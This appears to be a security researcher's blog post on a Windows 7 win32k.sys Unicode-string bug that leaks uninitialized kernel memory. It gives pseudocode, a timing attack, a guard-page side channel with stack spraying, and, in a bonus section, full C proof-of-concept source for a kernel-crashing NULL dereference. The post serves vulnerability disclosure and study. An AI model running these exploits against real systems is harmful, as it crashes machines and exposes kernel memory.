A story of win32k!cCapString, or unicode strings gone bad

In the most recent blog post (“Fun facts: Windows kernel and guard pages”), we have learned how the code coverage of kernel routines referencing user-mode memory can be determined by taking advantage of the fact that kernel-mode code triggers guard page exceptions in the same way as user-mode does. Today, I will present how the trick can be used in a practical attack against an actual 0-day vulnerability in the Windows kernel. Don’t get too excited though – the bug is a very peculiar type of an information disclosure class, not particularly useful in any sort of real-life attack. Despite being of minimal severity due to the extent of information the bug makes it possible to leak, it makes a great example of how the misuse of the UNICODE_STRING structure and related kernel routines can lead to opening up a security loophole in the operating system.

Microsoft has been aware of the issue for over 4 months, but due to its low severity, I believe it is rather unlikely it will be fixed any time soon.

Unicode string security

All of the most recent versions of the Windows operating system (starting with Windows 2000) internally handle textual strings using the UTF-16 encoding and a UNICODE_STRING structure defined as follows:

typedef struct _LSA_UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

Together with the structure definition, both user- and kernel-mode API interfaces provide a set of functions designed to initialize, examine, compare and otherwise operate on unicode strings, e.g. RtlInitUnicodeString, RtlAnsiStringToUnicodeString or RtlAppendUnicodeStringToString. In the above listing, the Length field represents the current length of the string in bytes (it must be a multiplicity of two due to the encoding used), MaximumLength indicates the total capacity of the buffer in bytes and Buffer points to the actual data. Note that both Length and MaximumLength fields are only 16-bits long, which is by far enough to accommodate the size of any string used during normal operation of the system. Perhaps contrary to intuition, the relatively limited ranges of the integers (making it possible to easily craft a string of a maximum size) do not pose any serious threat with regards to integer arithmetic, because overflowing either fields doesn’t give the attacker much edge. If you think about it, getting Length to be smaller than the actual length of the string can only lead to overwriting the existing buffer contents, but will never result in writing past the pool allocation. Similarly, setting MaximumLength to an overly small number only puts a more strict limitation on how many bytes can be stored in the corresponding buffer, or causes all subsequent calls to fail due to an invalid Length > MaximumLength condition. As a consequence, integer overflows are not of much interest in this context.

In general, the overall unicode-handling functionality is trivial enough that it is fairly uncommon to observe purely unicode-based vulnerabilities fixed in the Windows kernel. Interestingly, there are still several things that can go wrong as a result of programming mistakes made by kernel-mode developers, such as:

  • Assuming that the Length or MaximumLength of a user-supplied UNICODE_STRING is divisible by two. Depending on various factors, this can lead to denial of service or even local elevation of privilege conditions under specific circumstances. For example, imagine the following snippet of device driver code:
    PUNICODE_STRING UserString = /* user-controlled source */;
    PWCHAR LocalString;
    UINT i;
    
    LocalString = ExAllocatePool(PagedPool, LocalString->Length);
    if (LocalString != NULL) {
      for (i = 0; i != UserString->Length; i += sizeof(WCHAR)) {
        LocalString[i / sizeof(WCHAR)] = UserString->Buffer[i / sizeof(WCHAR)];
      }
    }

    If a rogue user provided an input string with an odd number of bytes, the terminal condition for the for loop would be never met, thus resulting in writing past the pool-based buffer until either the source or destination region end, at which point the system would crash.

  • Assuming that calls to Unicode API functions always succeed. If you look closely, it turns out that a number of the string manipulation routines can fail under specific conditions, and the fact is signalized by an appropriate error code. For example, MSDN lists the following two possible return values for the RtlAppendUnicodeStringToString function:
    • STATUS_SUCCESS: The source string was successfully appended to the destination counted string. The destination string length is updated to include the appended bytes.
    • STATUS_BUFFER_TOO_SMALL: The destination string length is too small to allow the source string to be concatenated. Accordingly, the destination string length is not updated.

    The consequences of assuming that every operation succeeds can vary, depending on what other assumptions are derived from the original one. If a buggy driver assumes that once an “append” call completes, the Length field has a specific value without really verifying it, it can end up disclosing random pool bytes or doing something even more dangerous.

  • Directly mangling with the UNICODE_STRING fields. The Unicode API is designed so that it is impossible to cause memory corruption only by using the system provided functions. However, modifying the values on one’s own is very easy to get wrong, at the risk of a potential security vulnerability.

Now back to the symbol from the title of the post: win32k!cCapString. A pseudocode C-like version of the routine found in win32k.sys on a fully patched Windows 7 SP1 32-bit platform is shown below:

INT cCapString(WCHAR *dst, WCHAR *src, UINT len) {
  PWCHAR src_end;
  PWCHAR i;
  INT real_len;
  UNICODE_STRING DestinationString;
  UNICODE_STRING SourceString;

  src_end = &src[len - 1];
  for (i = src; i < src_end; i++) {
    if (*i == L'\0') {
      break;
    }
  }

  real_len = i - src;
  if (real_len) {
    SourceString.Length = 2 * real_len;
    SourceString.MaximumLength = 2 * len;
    SourceString.Buffer = src;

    DestinationString.MaximumLength = 2 * len;
    DestinationString.Buffer = dst;

    RtlUpcaseUnicodeString(&DestinationString, &SourceString, 0);
  }

  dst[real_len] = L'\0';
  return real_len;
}

The routine is very simple in its principle: given a source unicode string, a destination buffer and its size expressed in wide characters, the function copies an upper-case version of src to dst. When you investigate the code, it becomes apparent that there are at least three problems with the implementation:

  1. Given a long enough input string, the expressions in lines 17, 18 and 19 can overflow the USHORT type. This in itself wouldn’t be too bad if the values assigned to SourceString.Length and DestinationString.MaximumLength were consistent. However, due to the fact that real_len is calculated separately, it is theoretically possible to set each field to any value independently, including numbers that result in an errornous Length > MaximumLength condition. When RtlUpcaseUnicodeString encounters a SourceString.Length > DestinationString.MaximumLength situation, here’s what happens:
      else if (SourceString->Length > DestinationString->MaximumLength) {
        return STATUS_BUFFER_OVERFLOW;
      }
  2. The return value of RtlUpcaseUnicodeString is not verified in any way.
  3. The cCapString function itself doesn’t implement error handling, thus it is unable to inform the caller about a potential problem in capturing the input string. Instead, it always returns the “real length” of src as the number of captured bytes.

Based on the above, it is possible to cause the function to misbehave by not writing anything at all to dst (due to the failing RtlUpcaseUnicodeString call), yet returning the number of non-null characters in the input string as the number of captured bytes. This is achieved by passing a string consisting of 32768 characters and putting a unicode null at the desired position, later used as the cCapString return value. Now, let’s find out if callers of the buggy function allow user-mode to pass arbitrarily-sized strings, in the first place!

On Windows 7, the routine is invoked from 16 different locations. While originally investigating the issue, I have gone through the trouble of looking into each of them, concluding that the only one with any exploitability potential is win32k!bCheckAndCapThePath, implemented as follows:

BOOLEAN bCheckAndCapThePath(PWCHAR dst, PWCHAR src, ULONG len, ULONG exp_files) {
  INT act_files;
  ULONG i;

  /* Sanitize the (src, len) pair. */

  if (src[len - 1] != L'\0') {
    return false;
  }

  cCapString(dst, src, len);

  for (i = 0, act_files = 1; i < len; i++) {
    if (dst[i] == L'|') {
      dst[i] = L'\0';
      act_files++;
    }
  }

  return (exp_files == act_files);
}

What the function does is basically call cCapString over the input arguments, count the number of the “|” unicode character instances in the resulting buffer and check if the count matches one of its arguments. Once again, the routine unconditionally assumes that cCapString always succeeds, and doesn’t even bother checking or using its return value – instead, it iterates through all len characters. There are two scenarios in which the function will start accessing uninitialized bytes in dst: one because of the bugs in cCapString, and one because of bCheckAndCapThePath itself:

  1. If the nested RtlUpcaseUnicodeString call fails entirely, none of the bytes in dst are properly initialized. The L’|’ characters are counted in a buffer that only contains garbage.
  2. If we insert a nul character somewhere inside of the string in addition to the end, real_len will be smaller than len, thus dst will be only partially filled. Because the function discards all signs of the real length of dst (return value of cCapString, nul character at the end), the “for” loop will iterate through garbage data of size len – real_len.

The bCheckAndCapThePath has three different callers: NtGdiAddFontResourceW, NtGdiRemoveFontResourceW and NtGdiGetFontResourceInfoInternalW.  The parameters passed to bCheckAndCapThePath are based on the syscalls’ arguments in the following manner:

  • dst is a kernel-mode buffer, allocated from:
    • the syscall handler’s stack (a local buffer), if the length is below or equal to 160 bytes.
    • session paged pool, if the length is below or equal to 2088 bytes (for NtGdiAddFontResourceW), or 40960000 bytes (for NtGdiRemoveFontResourceW and NtGdiGetFontResourceInfoInternalW)
  • src is a user-controlled pointer.
  • len is the user-controlled length of dst.
  • files is a user-controlled number.

This means that the first bug (integer overflow in MaximumLength) can be triggered using the “Remove” and “Get” system calls because they allow long enough strings to be passed down the call chain, and the second one (misplaced nul) can be triggered with all three services. Simply put, the vulnerability allows an attacker to ask the following question:

Is the number of the “0x007c” words found at even offsets of an uninitialized stack buffer (up to 160 bytes long) or session paged pool buffer (up to 40960000 bytes) equal to x?

where the value of x and length of the buffer are controlled by the attacker. If we don’t guess correctly, we never get a second chance for the same memory region, as all instances of 0x007c are instantly replaced with 0x0000 inside the counting loop. The answer to the question is returned in the form of a boolean value from the bCheckAndCapThePath call; in order to disclose the information to user-mode, that return value must be somehow recovered from ring-3. If we decide to use NtGdiRemoveFontResourceW for further exploitation, it turns out that its code execution path highly depends on the result of the bCheckaAndCapThePath invocation. More precisely, the following construct can be found in the function:

if (bCheckAndCapThePath(dst, src, len, files)) {
  /* Sanitize "PDWORD a6", the sixth syscall parameter */

  UINT value = a6[1];

  /* Implement the rest of the functionality */
}

The fact that the user-supplied pointer from the 6-th parameter is referenced if and only if the previous function call succeeds can be taken advantage of in two different ways. The first idea involves carrying out a timing attack: we can pass an invalid pointer as a6, thus getting the kernel to generate an exception in case of a correct guess. There is a fine difference in the amount of time taken by the kernel to properly dispatch the exception in comparison to just normally exiting the syscall handler. The following list of values illustrates the timings (in CPU ticks) achieved for buffer size=160 and a correct guess (none 0x007c words in the region) vs. an incorrect guess (one hundred 0x007c words in the region, obviously false):

1. correct: 128404 ticks, incorrect: 730 ticks
2. correct: 8751 ticks, incorrect: 643 ticks
3. correct: 4462 ticks, incorrect: 614 ticks
4. correct: 4395 ticks, incorrect: 640 ticks
5. correct: 4169 ticks, incorrect: 600 ticks
6. correct: 4221 ticks, incorrect: 593 ticks
7. correct: 4204 ticks, incorrect: 588 ticks
8. correct: 4145 ticks, incorrect: 596 ticks
9. correct: 4157 ticks, incorrect: 596 ticks
10. correct: 4143 ticks, incorrect: 594 ticks
11. correct: 4160 ticks, incorrect: 596 ticks
12. correct: 4334 ticks, incorrect: 643 ticks
13. correct: 4131 ticks, incorrect: 591 ticks
14. correct: 4160 ticks, incorrect: 596 ticks
15. correct: 4143 ticks, incorrect: 596 ticks
16. correct: 4145 ticks, incorrect: 591 ticks
Minimum correct: 4131 ticks, incorrect: 588 ticks

As clearly visible, it takes approximately eight times longer for the system call to complete if we make a correct guess, making it trivially distinguishable from an incorrect hit. As you can probably imagine at this point, the attack can be also conducted in a more deterministic way, by making use of the technique discussed last time. Instead of passing an invalid pointer and hoping for an exception to occur, we can set it to a PAGE_GUARD-protected memory page and later determine if the memory was accessed by testing the guard bit of the page!

It is rather uncommon to observe the 0x007c word in random garbage on the stack or pool allocations. In order to test if the exploit implementing the guard page idea works, we can intentionally spray the kernel-mode stack of the current thread with the expected value, as described in the “nt!NtMapUserPhysicalPages and Kernel Stack-Spraying Techniques” post from two years ago:

  CONST ULONG kSprayingSize = 4096;

  PWORD lpSprayBuffer = (PWORD)malloc(kSprayingSize);
  for (ULONG i = 0; i < kSprayingSize / sizeof(WORD); i++) {
    lpSprayBuffer[i] = 0x007c;
  }

  SystemCall(__NR_NtMapUserPhysicalPages,
             NULL,
             kSprayingSize / sizeof(DWORD),
             lpSprayBuffer);

After running the above snippet of code, we can proceed to disclosing the locations of the magic words on stack. In order to capture the precise location of each of them, we need to scan the stack progressively, i.e. iterate through the 1, 2, 3, …, 80 buffer sizes and set the the guessed “|” count to 1. This way, we can mitigate the fact that each guess attempt removes the special characters from the examined memory area. The final result of a working proof of concept exploit is the following output:

Word 0x007c found at kernel stack offsets: {0xc, 0xe, }

which proves truthful given the actual stack layout:

0: kd> dw eax
8a727b58  fe74 0022 52c0 86cd e4d0 85af 007c 007c <=== here
8a727b68  0400 0000 e220 85af 63b0 86f2 9350 c03a
8a727b78  58d7 832e ab6c 8462 7bec 8a72 1000 8074
8a727b88  0110 0000 0008 0000 0100 0000 0000 0000
8a727b98  0000 0000 1000 0000 0000 0000 4934 0002
8a727ba8  7c1c 8a72 1638 8329 ff7e 0003 0110 0000
8a727bb8  a335 7526 0000 0000 0016 0000 0000 0000
8a727bc8  0000 0000 0000 0001 1000 0000 0000 0000

The source code of both proof of concept exploits for Windows 7 32-bit can be found here and here.

Bonus

In addition to the Unicode bug, there is also a fairly trivial NULL Pointer Dereference issue of a Denial of Service class in NtGdiGetFontResourceInfoInternalW. If we pass in valid syscall parameters, with the exception of the 4th argument which needs to be a number larger than 0x2710000 (e.g. INT_MAX), the following bugcheck is triggered:

FAULTING_IP: 
win32k!GetFontResourceInfoInternalW+183
82ea70ab 8901            mov     dword ptr [ecx],eax

TRAP_FRAME:  9785ba28 -- (.trap 0xffffffff9785ba28)
ErrCode = 00000002
eax=00000001 ebx=fffffffe ecx=00000000 edx=00000021 esi=ffac2568 edi=00000000
eip=82ea70ab esp=9785ba9c ebp=9785baac iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!GetFontResourceInfoInternalW+0x183:
82ea70ab 8901            mov     dword ptr [ecx],eax  ds:0023:00000000=????????
Resetting default scope

DEFAULT_BUCKET_ID:  INTEL_CPU_MICROCODE_ZERO

BUGCHECK_STR:  0x8E

PROCESS_NAME:  a.exe

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from 83330d8f to 832cc570

STACK_TEXT:  
9785afdc 83330d8f 00000003 06a179e1 00000065 nt!RtlpBreakWithStatusInstruction
9785b02c 8333188d 00000003 9785b430 00000000 nt!KiBugCheckDebugBreak+0x1c
9785b3f0 83330c2c 0000008e c0000005 82ea70ab nt!KeBugCheck2+0x68b
9785b414 833063be 0000008e c0000005 82ea70ab nt!KeBugCheckEx+0x1e
9785b9b8 832904a6 9785b9d4 00000000 9785ba28 nt!KiDispatchException+0x1ac
9785ba20 8329045a 9785baac 82ea70ab badb0d00 nt!CommonDispatchException+0x4a
9785baac 82e7141a 9785bb54 00000021 00000001 nt!Kei386EoiHelper+0x192
9785bc10 8328f8ba 0022febe 00000021 00000001 win32k!NtGdiGetFontResourceInfoInternalW+0x103
9785bc10 00401397 0022febe 00000021 00000001 nt!KiFastCallEntry+0x12a
WARNING: Stack unwind information not available. Following frames may be wrong.
0022fe88 0040141b 000010b9 0022febe 00000021 a+0x1397
0022ff18 004010b9 00000000 7ffdd000 0022ff68 a+0x141b
0022ff68 00401284 00000001 00000000 00000000 a+0x10b9
0022ff88 7570ed6c 7ffdd000 0022ffd4 7718377b a+0x1284
0022ff94 7718377b 7ffdd000 7476b3b1 00000000 kernel32!BaseThreadInitThunk+0xe
0022ffd4 7718374e 0040126c 7ffdd000 00000000 ntdll!__RtlUserThreadStart+0x70
0022ffec 00000000 0040126c 7ffdd000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb

FOLLOWUP_IP: 
win32k!GetFontResourceInfoInternalW+183
82ea70ab 8901            mov     dword ptr [ecx],eax

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  win32k!GetFontResourceInfoInternalW+183

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: win32k

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  51301bf1

FAILURE_BUCKET_ID:  0x8E_win32k!GetFontResourceInfoInternalW+183

BUCKET_ID:  0x8E_win32k!GetFontResourceInfoInternalW+183

Followup: MachineOwner
---------

A Proof of Concept exploit source code for Windows 7 32-bit is as follows:

#include <limits.h>
#include <windows.h>

#define __NR_NtGdiGetFontResourceInfoInternalW 0x10b9

ULONG STDCALL SystemCall(DWORD ApiNumber, ...) {
  __asm("lea edx, [ebp+0x0c]");
  __asm("mov eax, %0":"=m"(ApiNumber));
  __asm("int 0x2e");
  __asm("leave");
  __asm("ret");
}

int main() {
  CONST WCHAR pwszFiles[] = L"\\??\\C:\\WINDOWS\\FONTS\\AHRONBD.TTF";

  LoadLibrary("user32.dll");
  SystemCall(__NR_NtGdiGetFontResourceInfoInternalW,
             pwszFiles,
             sizeof(pwszFiles) / sizeof(WCHAR),
             1,
             INT_MAX,
             0xAAAAAAAA,
             0xBBBBBBBB,
             0);

  return 0;
}